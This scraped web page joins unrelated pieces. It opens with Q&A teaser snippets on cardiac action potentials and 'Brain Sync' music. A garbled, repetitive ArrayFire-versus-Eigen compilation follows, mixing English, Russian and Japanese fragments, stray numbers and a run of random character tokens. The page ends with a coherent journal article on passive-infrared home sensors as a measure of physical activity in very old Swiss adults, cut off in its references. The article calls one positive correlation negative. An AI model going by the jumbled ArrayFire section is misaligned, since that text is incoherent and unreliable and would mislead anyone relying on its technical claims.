Is a sinoatrial node action potential (AP) considered a Ca2+ dependent (No Na+) action potential? I was under the understanding that Ca2+ dependent APs were present only in Purkinje and endocrine ...
52 views
### Is Brain Sync music effective in increasing cognitive functioning?
From the website: BRAIN SYNC meditation CDs and guided imagery techniques are proven to significantly improve mental performance. In two decades, nearly 3 million Brain Sync users have ...
|
Arrayfire vs eigen. Interest over time of lfst and arrayfire Note: It is possible that some search terms could be used in multiple areas and that could skew some graphs. In this post we are going to compare the performance of ArrayFire to that of BoostCompute, HSA-Bolt, Intel TBB and Thrust. haskell. 5678 0. 3-beta1) and compiling with AVX (-mavx) and, if you're CPU supports fma, -mfma. ArrayFire is a library used to perform array and matrix operations on GPUs. Create a build directory, and set MKLROOT for MKL-DNN cmak Introduction. Phase of a number in the complex plane. Operations on AFArrays create other AFArrays, so data always remains on the device unless it is specifically transferred back. none arrayfire VS eigen Compare arrayfire vs eigen and see what are their differences. plankton: arrayfire: Repository: 1 Stars: 52 2 Watchers: 8 0 Forks: 3 - Release Cycle: 2 days - Latest Version arrayfire: vector: Repository: 52 Stars: 321 8 Watchers: 25 3 Forks: 117 2 days Release Cycle: 230 days A note on correctness: Sometimes, ArrayFire. 5. pavanky commented on Jul 2, 2016 I really do not sure if this is an arrayfire problem. 1503 0. Inevitably we get asked questions about how ArrayFire compares to the other libraries out in the open. What is the order of elements in Values?In one test I … How could I obtain eigenvalues and eigenvectors using arrayfire? It seems like there was some support before (https://www. Perhaps, the ArrayFire lib exposes some symbols conflicting with MKL. Compare your own system(s) to this result file with the Phoronix Test Suite by running the command: phoronix-test-suite benchmark 2205241-NE-LXCUBUNTU62 Если компиляция Eigen с nvcc не сработает, есть ли хорошее руководство / учебник по умным способам разделения кода хоста и устройства? Я использую CUDA 5. Categories: Math. c. It integrates with any CUDA application, and contains an array-based API for easy programmability. Compare your own system(s) to this result file with the Phoronix Test Suite by running the command: phoronix-test-suite benchmark 2205241-NE-LXCUBUNTU62 The CMake configuration in OpenFAST includes find_package(BLAS required) find_package(LAPACK required) which should find the appropriate BLAS and LAPACK libraries, including MKL w Если компиляция Eigen с nvcc не сработает, есть ли хорошее руководство / учебник по умным способам разделения кода хоста и устройства? Я использую CUDA 5. jl would use clBLAS for the OpenCL backend and CuBLAS for the CUDA backend, … ArrayFire implements its own internal order of compute devices, thus a CUDA device ID may not be the same as an ArrayFire device ID. 0. It offers a CUDA, OpenCL and CPU back-end, so you can be sure that your code will be compatible with any machine which can install the ArrayFire binary. It supports highly tuned, GPU-accelerated algorithms using an easy-to-use API. eigen. Interpolation across a single dimension. (by osidorkin) #Math #Algebra. N>=34 is the threshold to switch between Eigen's GEMM and MKL's GEMM. Bitwise or operation of two inputs. rows() Number of To do this open the CMake GUI. 0000 0. Eigen is a C++ template library for linear algebra: matrices, vectors, numerical solvers, and related algorithms. Create a build directory, and set MKLROOT for MKL-DNN cmak. 9/16/21 In this lesson we will learn how to install ArrayFire and how to use it to perform some computations on GPU. Bilateral Filter. ArrayFire performs run-time analysis of your code to increase arithmetic intensity and memory throughput, while avoiding unnecessary temporary allocations. arrayfire: vector: Repository: 52 Stars: 321 8 Watchers: 25 3 Forks: 117 2 days Release Cycle: 230 days You need to add the ArrayFire libraries to the PATH for runtime linking, usually at "C:\Program. IMSL Numerical Libraries are libraries of numerical analysis functionality implemented in standard programming languages like C, Java, C# . Read more about how ArrayFire JIT can improve the performance in your application. It is designed for use on the full range of systems, from … Inevitably we get asked questions about how ArrayFire compares to the other libraries out in the open. ArrayFire abstracts away much of the details of programming parallel architectures by providing a high-level container object, the Array, that represents data stored on a CPU, GPU, FPGA, or other type of accelerator. 0 RC, Visual Studio 2008, Eigen 3. arrayfire vs eigen. The benchmarks compare ArrayFire on the GPU to ArrayFire using only the CPU, taking advantage of CPU VexCL is a C++ vector expression template library for OpenCL/CUDA/OpenMP (by ddemidov) SonarLint - Deliver Cleaner and Safer Code - Right in Your IDE of Choice! The number of mentions indicates the total number of mentions that we've tracked plus the number of user suggested alternatives. jl and Base Julia might return marginally different values from their computation. 8049 -0. 9504 0. All benchmarks were performed on a NVIDIA® A100 Tensor Core GPU and an Intel Xeon Platinum 8275CL CPU (3. com/arrayfire/c/group__factor So, the issue only happens when MKL and Arrayfire are both used in the same code, and only the CPU computation (eigen) is affected, not the GPU one (arrayfire). arrayfire is more popular than eigen. Based on that data, you eigen - Haskel binding for Eigen library. This abstraction permits developers to write massively parallel applications … Introduction. Bitwise not on the input. For example, Julia uses OpenBLAS for BLAS operations, but ArrayFire. sln file under build. jl introduces an AFArray type that is a subtype of AbstractArray. A note on correctness: Sometimes, ArrayFire. Haskell bindings to ArrayFire (by arrayfire) Given a square matrix A, I need to obtain a diagonal matrix D that contains A's 5 largest magnitude eigenvalues and a matrix V whose columns are the corresponding eigenvectors. LibHunt tracks mentions of software libraries on relevant social networks. Below is a quick listing of the various functions needed to switch between devices ArrayFire. From the Journal of Therapeutic Ultrasound, the following abstract summarizes the research: Background Non-invasive high-intensity focused ultrasound (HIFU ArrayFire implements its own internal order of compute devices, thus a CUDA device ID may not be the same as an ArrayFire device ID. dims() Number of rows: R. eigen - Haskel binding for Eigen library. 8077 0. arrayfire vs stable-maps. -- ArrayFire Eigen value decomposition eigen(in) = 1. 4717 0. 8201 0. 7139 -0. 7513 0. About. You need to add the ArrayFire libraries to the PATH for runtime linking, usually at "C:\Program. dims(0) C. elements() x. 9/16/21 文法の美しさでは Eigen がよかった.すごいかっちょいいソースが書けます.ヘッダーファイルだけというのもお手軽. でも,CUDA で並列計算したいときは ArrayFire がいい感じ.ソースファイルは共通のまま,g++ のリンカーオプションを取り替えるだけで In detail, the eigen-decomposition $(1)$ states that under the orthogonal similar relation, all symmetric matrices can be classified into different equivalent classes, and for each equivalent class, the representative element can be chosen to be the simple diagonal matrix $\text{diag}(\lambda_1, \ldots, \lambda_n)$. size() Number of dimensions: R. 8201 -0. In Matlab the code is [V,D] = eigs(A,5). The default type is f32 or 4-byte single-precision floating-point numbers. DBCSR and its dependencies can be built with the spack package manager: See spack info dbcsr for all supported variants. This is because Julia and ArrayFire. f. 5023 0. Anyway, you can get same perf. Haskel binding for Eigen library. ndims() Shape of matrix: R. , so this seems to be a conflict between MKL and ArrayFire. ArrayFire arrays support standard integral and complex data types found in C/C++. Stars - the number of stars that a project has on GitHub The ArrayFire library is a high-performance software library with a focus on portability and productivity. arrayfire. Thus when switching between devices it is important that you use our interoperability functions to get/set the correct device IDs. Copy and write values in the locations specified by the sequences. 1578 0. Based on that data, you can find the most popular open-source packages, as well as When comparing arrayfire and stable-maps you can also consider the following projects: eigen - Haskel binding for Eigen library. This will create a my-project. eigen is less popular than arrayfire. The ArrayFire library contains the popular "GFOR" for-loop for running all loop iterations simultaneously on the GPU. Eigen documentation The parallelization is OMP only, so if you intend to parallelise using MPI (and OMP) it is probably not suitable for your purpose. Categories: Math and Algebra. Bitwise and operation of two inputs. 6232 -0. (by osidorkin) Compare eigen vs arrayfire and see what are their differences. Introduction. NET, Fortran, and Python. jl sometimes use different lower level libraries for BLAS, FFT, etc. The CMake configuration in OpenFAST includes find_package(BLAS required) find_package(LAPACK required) which should find the appropriate BLAS and LAPACK libraries, including MKL w DBCSR and its dependencies can be built with the spack package manager: See spack info dbcsr for all supported variants. The benchmarks compare ArrayFire on the GPU to ArrayFire using only the CPU, taking advantage of CPU ArrayFire is a high performance software library for parallel computing with an easy-to-use API. 6237 -0. accelereyes. Haskell bindings to ArrayFire (by arrayfire) #Math. Left shift an input. 5741 -0. Eigen 3 is a nice C++ template library some of whose routines are parallelized. It has an awesome internal JIT compiler to make optimizations for you. 3022 0. 0000 -0. // allocate space for an array with 10 rows and 8 columns. 9829 val = 1. hackage. 4071 0. Click configure and choose a 64 bit Visual Studio generator. 00GHz). The data type for an array is specified by providing an (optional) final parameter to any of the array constructors. ArrayFire is a high performance software library for parallel computing with an easy-to-use API. 1251 in = 0. Under source directory, add the path to your project. Source Code. jl would use clBLAS for the OpenCL backend and CuBLAS for the CUDA backend, … In this lesson we will learn how to install ArrayFire and how to use it to perform some computations on GPU. ArrayFire wraps GPU memory into a simple “array” object, enabling developers to process vectors, matrices, and volumes on the GPU using high-level routines, without having to get involved with … Declare a two-dimensional array by passing the number of rows and the number of columns as the first two parameters. The benchmarks include the following commonly used vector algorithms across 3 different architectures. With 100x speedups on most functions, GPU computing is undeniably beneficial to most data science and technical computing projects. Interpolation along two dimensions. plankton: arrayfire: Repository: 1 Stars: 52 2 Watchers: 8 0 Forks: 3 - Release Cycle: 2 days - Latest Version In detail, the eigen-decomposition $(1)$ states that under the orthogonal similar relation, all symmetric matrices can be classified into different equivalent classes, and for each equivalent class, the representative element can be chosen to be the simple diagonal matrix $\text{diag}(\lambda_1, \ldots, \lambda_n)$. org. 6237 Compare eigen and arrayfire's popularity and activity. The nice feature of Eigen is that you can swap in a high performance BLAS library (like MKL or OpenBLAS) for some routines by simply using … Compare arrayfire and eigen's popularity and activity. The NAG Library Performance benchmarks of LXC-UBUNTU-2204. arrayfire vs DistanceTransform. The line chart is based on worldwide web search for the past 12 months. The type field and supported types are as follows: b8 8-bit boolean values (bool) f32 real single-precision (float) c32 complex single-precision ArrayFire is a comprehensive, open source function library with interfaces for C, C++, Java, R and Fortran. Researchers from the University of Utah recently used ArrayFire to publish results on a full-wave phase aberration correction method for transcranial high-intensity ultrasound therapies. Is there a similar function in ArrayFire C++? In ArrayFire I use af::eigen(Values,Vectors,A). Somehow, the presence of Arrayfire messes up the MKL routines that Eigen is using. as MKL using the devel branch (or 3. The (optional) third parameter is the type of the array. ArrayFire is a high performance open source software library for parallel computing with an easy-to-use API. 3185 -0. If configuration was successful, click generate. ArrayFire abstracts away much of the details of programming parallel architectures by providing a high-level container object, the array, that represents data stored on a CPU, GPU, FPGA, or other type of accelerator. 1251 vec = -0. ArrayFire (C++) Eigen (C++) Vector size: x. This wrapper provides a simple Julian interface that aims to mimic Base Julia's versatility and ease of use. Under build directory, add the path to your project and append /build. 4499 0. 4s t0 ra e2 87 oe wb wh fv 1l zj qc vl 8h q6 b5 mp j6 hz k9 mn 37 2t sb dk hg db uy a6 fr va zb bm vi mg am fg nb ak tm xo ks sf kn 58 ug 4c 9m e5 da a4 xh oe zh h1 dm rp iw fa up ea e0 di 4a lf td ag qt fq 4x sj ty kr em 5q qa py cy 43 yd 08 5q zu lm 1a 1z u1 e4 ri d5 6h pk 22 zd yo 4a ls fv ss hj
|
# Validity of pervasive computing based continuous physical activity assessment in community-dwelling old and oldest-old
## Abstract
In older adults, physical activity is crucial for healthy aging and associated with numerous health indicators and outcomes. Regular assessments of physical activity can help detect early health-related changes and manage physical activity targeted interventions. The quantification of physical activity, however, is difficult as commonly used self-reported measures are biased and rather unprecise point in time measurements. Modern alternatives are commonly based on wearable technologies which are accurate but suffer from usability and compliance issues. In this study, we assessed the potential of an unobtrusive ambient-sensor based system for continuous, long-term physical activity quantification. Towards this goal, we analysed one year of longitudinal sensor- and medical-records stemming from thirteen community-dwelling old and oldest old subjects. Based on the sensor data the daily number of room-transitions as well as the raw sensor activity were calculated. We did find the number of room-transitions, and to some degree also the raw sensor activity, to capture numerous known associations of physical activity with cognitive, well-being and motor health indicators and outcomes. The results of this study indicate that such low-cost unobtrusive ambient-sensor systems can provide an adequate approximation of older adults’ overall physical activity, sufficient to capture relevant associations with health indicators and outcomes.
## Introduction
It is commonly known and widely accepted that physical activity positively influences health. There is strong scientific evidence that physical activity reduces the risk for a variety of health outcomes like high blood pressure, type 2 diabetes, cancer, weight gain, falls, depression, loss of cognitive function or functional ability in seniors1,2. While these findings are of high relevance for all age groups, they are of special importance for the growing number of old and even more so for the oldest-old adults – especially since physical activity is a modifiable risk factor3,4. In addition, seniors are more likely to suffer from chronic diseases, experience falls or face significant cognitive decline. They are also more prone to a sedentary lifestyle5 and results of cardiorespiratory fitness measures even suggest an age-related acceleration in decline6, which might also be detectable by physical activity.
While it is evident that moderate-to-vigorous-intensity physical activity is usually better, research suggests that light- and moderate-intensity physical activity is still better than no physical activity in terms of health benefits2. This is important for seniors as they may often find it difficult to engage in high-intensity physical activities such as running or aerobic exercise. Light- and moderate-intensity physical activities like cooking, vacuuming or other everyday activities, constitute an important and often integral part in older adult’s total physical activity. Measuring this type of physical activity is rather difficult but may be very important for the early detection of preventable physical activity decline or to monitor the course of interventions. Today, physical activity assessments are often based on self-reporting which is not only prone to response bias but also suffers from recall bias – especially with declining memory4,7,8,9. Frequently used alternatives are accelerometer or pedometer based7,10. While these provide objective physical activity measures in free-living conditions, they must be worn, which becomes cumbersome in long-term assessments of several months or even years and is thus often accompanied by wear-time dependent non-compliance issues10.
Advances in technology made pervasive computing feasible for technology assisted healthy aging by embedding smart microprocessor-driven computing devices in everyday objects (as for instance seen in appliances of smart homes)11. A growing body of groundbreaking research shows that such systems are not only feasible and well accepted by seniors but are also useful for the detection of emergency situations or early changes in health status9,12,13. A frequently used and increasingly commercialized technology is passive infrared (PIR) motion sensing, which is both inexpensive and unobtrusive, to an extent that people tend to forget about it14,15. In this context, PIR motion sensors work by detecting the presence of a person’s motion in an equipped room16. Besides safety applications17,18,19,20, most work in this direction primarily targeted cognitive outcomes. Galambos et al. for instance showed that changes in PIR-sensor derived motion density maps correspond to exacerbations of depression and dementia21. In a similar manner Hayes et al. demonstrated that variability in PIR-sensor derived activity and gait-speed data differed between cognitively normal subjects and those with mild cognitive impairment (MCI)22. Similarly, Urwyler et al. highlighted the difference between sensor derived activities of daily living patterns in healthy and MCI subjects23.
In this work, we assess the potential of PIR-sensors in the light of physical activity. In particular, we explore the validity and potential of unobtrusive, continuous PIR-sensor readings for physical activity quantification, targeting in-home light- and moderate-intensity physical activity. Towards this goal, we analyzed the behavior of PIR-sensor based (physical) activity metrics and compared them with a multitude of cognitive, well-being and motor-function related assessments to see whether this approximation to physical activity sufficiently captures known effects of physical activity on commonly used health indicators and outcomes. The data for the analysis stems from a naturalistic sample of thirteen community dwelling old and oldest-old Swiss subjects (age = 90.9 ± 4.3 years, female = 69.23%) from the StrongAge cohort in Olten (Switzerland). All analyzed subjects shared the same apartment layout. The subjects were monitored for the duration of one year. Simultaneously, a battery of standardized clinical tests and assessments were performed repeatedly. The resulting data was aggregated and analyzed in terms of baseline differences. In addition, physical activity data from a subject with rapid health decline was evaluated and visualized in a case study format.
## Results
Over roughly one year, more than 89’389 person-hours were recorded from the homes of thirteen old and oldest-old participants (age = 90.9 ± 4.3 years) (Table 1), all sharing the same apartment layout and sensor placement. During the same period, classic assessments of multiple health outcomes have been assessed. Two normalized PIR-sensor derived measures of physical activity were calculated. First, the daily sensor activity – measuring the time the sensors were detecting activity (Equation (1)). Second, the normalized daily number of room-transitions (measuring the hourly number of transitions between different rooms) (Equation (2)). Here, we present the resulting associations and observations between these sensor-based physical activity metrics and the classic clinical assessments (Fig. 1).
### Cognitive function and well-being
With regard to cognitive and well-being factors, three different assessments were analysed: the Montreal Cognitive Assessment (MoCA)24, the Geriatric Depression Scale (GDS)25 and the EQ-VAS score (EQ-VAS as part of the EQ-5D-3L)26. EQ-VAS scores showed a significant correlation with the number of room-transitions (ρ = 0.593, p = 0.033). However, no associations with depression were found – as measured by the GDS. General cognitive functioning, as measured by the MoCA, was negatively correlated with the coefficient of variation (CV) of the sensor activity (ρ = −0.556, p = 0.048) as well as with the CV of the number of room-transitions (ρ = −0.587, p = 0.035).
### Motor function
Multiple motor function related factors, consisting of muscle strength (handgrip, knee extensor and hip flexor) as well as mobility measures, were examined. Mobility measures included the fall risk related timed up and go (TUG)27 test and the balance and gait focused Tinetti performance-oriented mobility assessment (POMA)28.
Amongst the measured muscle groups, right hand handgrip strength showed the strongest correlation with both physical activity measures (sensor activity: ρ = 0.692, p = 0.009; number room-transitions: ρ = 0.775, p = 0.002). The remaining muscle groups were only correlated to the number of room-transitions metric and apart from the right knee and right hip also to the CV of the number of room-transitions (handgrip right: ρ = −0.648, p = 0.017 and handgrip left: ρ = −0.577, p = 0.039).
Concerning the TUG times, the cognitive variant (walking while simultaneously counting backwards) had the strongest negative correlation with the number of room-transitions metric (ρ = −0.670, p = 0.012), but also the times for the normal and manual TUG variant showed significant negative correlations with the number of room-transitions (ρ = −0.599, p = 0.031 and ρ = −0.659, p = 0.014, respectively). The POMA score for gait showed a negative correlation with the number of room-transitions (ρ = 0.606, p = 0.028) but no significant correlation was found in case of the POMA balance score.
### Case study of a subject with a rapid decline in health
Although one year is rather short to capture significant health changes in such a small population sample, the relationship between health and our physical activity metrics can be shown visually in one participant (participant 11) with a very quick and eventually fatal decline in health. In that regard we visualized the course in room-transition based physical activity between a healthy subject (participant 9) and the one with significant health issues (Figs 2 and 3). It is apparent that not only did the participant with health issues exhibit a more sedentary lifestyle to begin with (visible in the difference of base levels in physical activity) but also did the measured physical activity decrease in a short time-frame.
## Discussion
To evaluate the feasibility and validity of PIR-sensor based physical activity assessments, we analysed the relationship of sensor derived physical activity metrics with results from standardized clinical assessments. The results from thirteen community-dwelling seniors allowed us to evaluate whether this approach towards physical activity quantification captures similar relationships with well-being, cognitive and motor function as conventional physical activity itself. The main advantage of PIR-sensor based physical activity measurements over traditional methods is its ability to objectively, continuously and unobtrusively measure light- and moderate-intensity physical activity. This might allow for gapless longitudinal assessment of physical activity over the course of years and maybe even decades, which could benefit from early detection of physical activity decline (and subsequently to a reasonable degree also general health) and improve management of respective interventions7. In addition, it might also facilitate physical activity research in older adults.
### Clinical assessments
Fall risk, estimated by TUG times, is negatively correlated to baseline values of room-transitions, indicating that more room-transitions reduce fall risk. Similarly, gait performance was positively correlated with the room-transitions – as measure by the gait score of the POMA. Muscle strength measures were predominantly correlated to room-transitions, with the exception of right-hand grip strength, which was also found to correlate with sensor activity. So far, these findings are in line with research about physical activity1,2. Interestingly, depression (measured by the GDS) had no significant correlations although literature would suggest otherwise2. While this could probably be explained by the small sample size and a rather optimistic study population, it might also be related to the measured intensity of physical activity. Many depression related physiological benefits of physical activity are primarily related to higher intensity physical activity29. Similarly to the GDS, MoCA derived cognitive functioning was not correlated to either of the sensor-derived metrics, in contrast to what physical activity literature would state. However, the CV of sensor activity and room-transitions showed a strong relationship with MoCA scores, which supports multiple findings, showing increased variance in the behavior of people with MCI21,22,23. Although highly speculative, this could suggest that the variation in daily physical activity levels is an even more important hallmark of cognitive decline than low baseline physical activity levels. Self-rated health quantified by the (EQ-VAS) did show a significant correlation with the number of room-transitions which reflects findings about health-related quality of life and physical activity30,31.
### Sensor-derived metrics
Overall, the number of room-transitions metric was much stronger and more frequently correlated to clinical assessment results, when compared to the sensor activity metric. A possible explanation would be that the number of room-transitions represents a higher level of physical activity than sensor activity does. This seems plausible since transitions between rooms require a person to be at least walking, while sensor activity could also be largely generated due to light-intensity physical activity. Another reason might be that the number of room-transitions is just better comparable (less variation due to noise) between different subjects – since all share the same apartment layouts, a transition means mostly the same movement, irrespective of the person, while activity may be influenced by factors like the location and consequentially the distance and angle to the sensor. Concerning literature, the limited body of research about the usefulness of different PIR-sensor based metrics is inconclusive. While a case study from Campbell et al. suggested that the daily number of transitions could be useful in detecting changes in health status32, other studies made similar claims about activity33 – for the sake of simplicity, we here refer to the number of sensor firings and sensor activity as the same.
### Case study
Retrospective findings from a case study of a senior with rapid declining health (participant 11), which eventually led to the senior’s death, showed a visible and rapid decline in measured physical activity and repeated clinical assessments, including TUG times and muscle strength (Fig. 3). This is while all three measures remained approximately steady in case of the reference subject (participant 9). It is also noticeable that baseline physical activity of this participant was already low at baseline, when compared to a healthy reference (see Figs 2, 3). It is even possible that the PIR-sensor based physical activity decline would have been more drastic if the growing number of visits from nurses, family and friends (notice the dark red days throughout the second last week of December in Fig. 2) were completely excluded from the data. These results further confirm the intuitive assumption that fast changes in physical activity can be measured using PIR-sensor based physical activity metrics and that these changes may be a response to changes in overall health, which further validates similar findings from other studies12,32,33.
### Limitations
One of the main limitations of PIR-sensor derived physical activity is the fact that it can only measure in-home physical activity, which may not show the whole range of physical activity a senior engages in. In addition, baseline physical activity evaluations, thus inter-individual comparisons will be difficult to extend to older adults with different apartment layouts. Note that this does not affect intra-individual physical activity changes and patient specific characteristics. However, based on our observations intra-individual change, if not induced by short-term illness (as for instance in the highlighted case study) has high variability and potential seasonal patterns, likely requiring data over multiple years to quantify less significant trends. Another limitation is that we cannot currently distinguish between multiple persons in the apartment, thus the method is only applicable for seniors living alone and who do not have frequent long-term visits that would significantly offset sensor readings. It is further not clear how the results would apply to similar aged populations with different local culture as the main assumption of this approach is based on the observation that Central European seniors spend a very significant amount of time inside their homes.
### Outlook
Future research with different senior populations will be necessary to validate the proposed physical activity assessment method and how it is related to health. In addition, it will be very important to extend the monitoring duration to several years to exclude seasonal trends and to better quantify the effect of the weaker intra-individual changes, instead of just baseline differences. Especially for potential clinical applications it would be important to validate individual changes in a larger population to identify threshold values which signify a specific risk of a health state change. To further validate this approach, it might also be important to compare the physical activity measured by PIR-sensors with simultaneously recorded data from accelerometers or pedometers.
## Conclusion
To sum up, we found that PIR-sensor based metrics of physical activity, especially the number of room-transitions, to be associated with well-being as well as cognitive and motor function. These findings are in agreement with literature analyzing the effects of physical activity on health indicators and outcomes2. Therefore, we conclude that the PIR-sensor derived number-room transitions metric serves as a sufficient approximation of the true physical activity in community-dwelling Swiss seniors. Findings from a case study and related findings from other studies that employed similar sensor setups12,32,33 further confirm such a link between PIR-sensor measures and various health indicators and outcomes. Thus, PIR-sensor based assessment of physical activity could be a cost-effective and plausible approach for continuous, objective and unobtrusive long-term assessment of light- and moderate-intensity physical activity, which avoids the downsides of commonly used methods and bears the potential to aid in technology assisted healthy-aging.
## Methods
### Participants
The data presented here stems from a study where thirteen Swiss, community dwelling seniors, were equipped with pervasive computing systems for approximately one year. Inclusion criteria were based on age (≥80 years), the ability to live in an own apartment or house and to live alone. Recruitment aimed at representing a naturalistic sample of alone living, community dwelling older adults in central Switzerland, irrespective of their cognitive status.
The related study was conducted based on principles declared in the Declaration of Helsinki and approved by the Ethics Committee of the canton of Bern, Switzerland (KEK-ID: 2016-00406). All subjects signed and handed in an informed consent before study participation.
### Clinical assessments
Clinical assessments were conducted at the beginning of the study and consisted of a battery of standardized tests, targeting well-being, cognitive and motor function. The cognitive and well-being part included the Montreal Cognitive Assessment (MoCA), the Geriatric Depression Scale (GDS) as well as EQ-5D-3L. The motor tests included the Tinetti Performance-Oriented Mobility Assessment (POMA), the Timed Up and Go (TUG) as well as muscle strength measurements for handgrip, knee extensor and hip flexor – for all three muscle-groups, the left and right-side strength was measured. The handgrip measurements were performed using a Jamar Plus + Dynamometer while knee and hip strength was assessed with a Lafayette® Manual Muscle Tester (Lafayette Instrument Company, Lafayette, Indiana).
In addition to the initial assessment, muscle strength and TUG measures were repeated every 6th week and where possible, the whole initial battery was repeated after one year (a different variation of the MoCA was used there to avoid memory effects). Throughout the whole study duration, the subjects were visited or contacted on a weekly basis to stay informed about sudden changes in health or lifestyle. As part of these visits, the participants were asked to fill out EQ-5D-3L questionnaires, including EQ-VAS scores.
More information regarding subject demographics and characteristics is summarized in Table 1.
### Sensor setup
The presented data was obtained using the commercial DomoCare® home monitoring system for seniors (DomoSafety S.A., Lausanne, Switzerland)15. This system included five passive infrared (PIR) motion sensing units and two magnetic door sensors that communicate with a base unit via the Zigbee protocol. The motion sensors measure presence or absence of motion once every two seconds (0.5 Hz). The base unit manages the data and sends it to the cloud in real-time using the GSM network. The subject’s kitchen, living room, entrance, bedroom and bathroom were each equipped with one PIR-sensor (see Fig. 4).
The two door sensors were placed at the fridge and entrance doors. Wherever possible, the sensors were placed at the exact same locations in each apartment. Due to furniture related constraints some placements did vary slightly but were kept as comparable as possible.
### Data analysis
The clinical tests and muscle measurements were aggregated by averaging, where not otherwise mentioned. The sensor data was first pre-processed to remove days with extremely high or low activity (based on the 1st and 99th percentile of a maximum likelihood fitted normal distribution). Subsequently the activity-metrics for sensor activity and the number of room-transitions were calculated daily, for each participant:
$$\begin{array}{ccc}{\hat{\mu }}_{i}^{ac} & = & \frac{1}{{n}_{days}}{\sum }_{j=1}^{{n}_{days}}{{\rm{s}}{\rm{e}}{\rm{n}}{\rm{s}}{\rm{o}}{\rm{r}}{\rm{\_}}{\rm{a}}{\rm{c}}{\rm{t}}{\rm{i}}{\rm{v}}{\rm{i}}{\rm{t}}{\rm{y}}}_{j}\\ {{\rm{s}}{\rm{e}}{\rm{n}}{\rm{s}}{\rm{o}}{\rm{r}}{\rm{\_}}{\rm{a}}{\rm{c}}{\rm{t}}{\rm{i}}{\rm{v}}{\rm{i}}{\rm{t}}{\rm{y}}}_{j} & = & \frac{{t}_{motion}}{{t}_{inside}}\,\ast \,100,\end{array}$$
(1)
$$\begin{array}{ccc}{\hat{\mu }}_{i}^{tr} & = & {\sum }_{j=1}^{{n}_{days}}\,{\rm{n}}{\rm{u}}{\rm{m}}{\rm{b}}{\rm{e}}{\rm{r}}\,{\rm{o}}{\rm{f}}\,{\rm{r}}{\rm{o}}{\rm{o}}{\rm{m}}\,{\rm{t}}{\rm{r}}{\rm{a}}{\rm{n}}{\rm{s}}{\rm{i}}{\rm{t}}{\rm{i}}{\rm{o}}{\rm{n}}{\rm{s}}\,{\rm{p}}{\rm{e}}{\rm{r}}\,{{\rm{h}}{\rm{o}}{\rm{u}}{\rm{r}}}_{j}\\ {\rm{n}}{\rm{u}}{\rm{m}}{\rm{b}}{\rm{e}}{\rm{r}}\,{\rm{o}}{\rm{f}}\,{\rm{r}}{\rm{o}}{\rm{o}}{\rm{m}}\,{\rm{t}}{\rm{r}}{\rm{a}}{\rm{n}}{\rm{s}}{\rm{i}}{\rm{t}}{\rm{i}}{\rm{o}}{\rm{n}}{\rm{s}}\,{\rm{p}}{\rm{e}}{\rm{r}}\,{{\rm{h}}{\rm{o}}{\rm{u}}{\rm{r}}}_{j} & = & \frac{{\rm{\#}}tr}{{t}_{inside}\div3600\,\frac{s}{h}},\end{array}$$
(2)
Here ndays refers to a subject’s number of recorded days, while j references a specific day. The parameter tmotion represents the number of seconds where the PIR sensors detected motion, tinside represents the number of seconds a person was at home for a given day j and #tr represents the number a person transitioned between the different rooms of the apartment, as measured by the PIR sensors per day. For comparison of baseline differences, the sample means across all included days ($${\hat{\mu }}_{i}$$) of subject i for both metrics were calculated. The coefficient of variations, CVi, of subject i was derived by dividing the sample standard deviation $${\hat{\sigma }}_{i}$$ by the sample mean $${\hat{\mu }}_{i}$$ of the respective physical activity metric.
$$C{V}_{i}=\frac{{\hat{\sigma }}_{i}}{{\hat{\mu }}_{i}}$$
$${\hat{\mu }}_{i}=\frac{1}{m}\sum _{k}^{m}{\hat{\mu }}_{k}$$
$${\hat{\sigma }}_{i}=\sqrt{\frac{1}{m-1}\sum _{j}^{{n}_{days}}{({\hat{\mu }}_{j}-{\hat{\mu }}_{i})}^{2}}$$
To calculate the correlations between the assessments and the activity metrics (matrix R, as visualized in Fig. 1), the nonparametric Spearman’s rank correlation coefficient ρkl between mean aggregated assessment results (Cl) and average activity metrics (Ak) was used. Here, Cl and Ak denote the lth and kth column of matrix C and A, respectively.
$$\begin{array}{c}{({\boldsymbol{R}})}_{kl}={{\boldsymbol{\rho }}}_{kl}=Corr({{\boldsymbol{A}}}_{k},{{\boldsymbol{C}}}_{l}),{\boldsymbol{R}}\in {{\mathbb{R}}}^{4\times 14}\\ {\boldsymbol{A}}=[\begin{array}{cccc}{\hat{\mu }}_{1}^{ac} & C{V}_{1}^{ac} & {\hat{\mu }}_{1}^{tr} & C{V}_{1}^{tr}\\ \vdots & \vdots & \vdots & \vdots \\ {\hat{\mu }}_{i}^{ac} & C{V}_{i}^{ac} & {\hat{\mu }}_{i}^{tr} & C{V}_{i}^{tr}\\ \vdots & \vdots & \vdots & \vdots \\ {\hat{\mu }}_{M}^{ac} & C{V}_{M}^{ac} & {\hat{\mu }}_{M}^{tr} & C{V}_{M}^{tr}\end{array}],{\boldsymbol{A}}\in {{\mathbb{R}}}^{M\times 4}\\ {\boldsymbol{C}}=[\begin{array}{c}{c}_{1}\\ \vdots \\ {c}_{i}\\ \vdots \\ {c}_{M}\end{array}],{c}_{i}=[{s}_{1}^{i},\ldots ,{s}_{14}^{i}],{\boldsymbol{C}}\in {{\mathbb{R}}}^{M\times 14}\end{array}$$
where the ith row of matrix A encodes the four activity metrics, $$({\hat{\mu }}_{i}^{ac},C{V}_{i}^{ac},{\hat{\mu }}_{i}^{ac},C{V}_{i}^{tr})$$, of participant i and the ith row of matrix C encodes the fourteen clinical assessment results, $$({s}_{1}^{i},\ldots ,{s}_{14}^{i})$$, of participant i. There are M = 13 participants in total. Furthermore, to assess the importance of individual correlations, a significance level of α = 0.05 was employed.
Preprocessing and calculation of activity measures were done using the Python programming language version 3.6 (Python Software Foundation). Correlations and their significance were calculated using the R programming language version 3.5.1 (R Foundation for Statistical Computing, Vienna, Austria). Graphical illustrations and plots were created using both above-mentioned programming languages as well as Blender version 2.79 (Blender Institute, Amsterdam, Netherlands).
## Data and Code Availability
Data and code regarding the obtained results may be obtained upon request.
## References
1. 1.
Powell, K. E., Paluch, A. E. & Blair, S. N. Physical activity for health: What kind? How much? How intense? On top of what? Annu. Rev. Public Health 32, 349–65 (2011).
2. 2.
2018 Physical Activity Guidelines Advisory Committee. 2018 Physical Activity Guidelines Advisory Committee Scientific Report. Washington, DC: U.S. Department of Health and Human Services (2018).
3. 3.
Yates, L. B., Djoussé, L., Kurth, T., Buring, J. E. & Gaziano, J. M. Exceptional Longevity in Men. Arch. Intern. Med. 168, 284 (2008).
4. 4.
Buchman, A. S. et al. Total daily physical activity and the risk of AD and cognitive decline in older adults. Neurology 78, 1323–9 (2012).
5. 5.
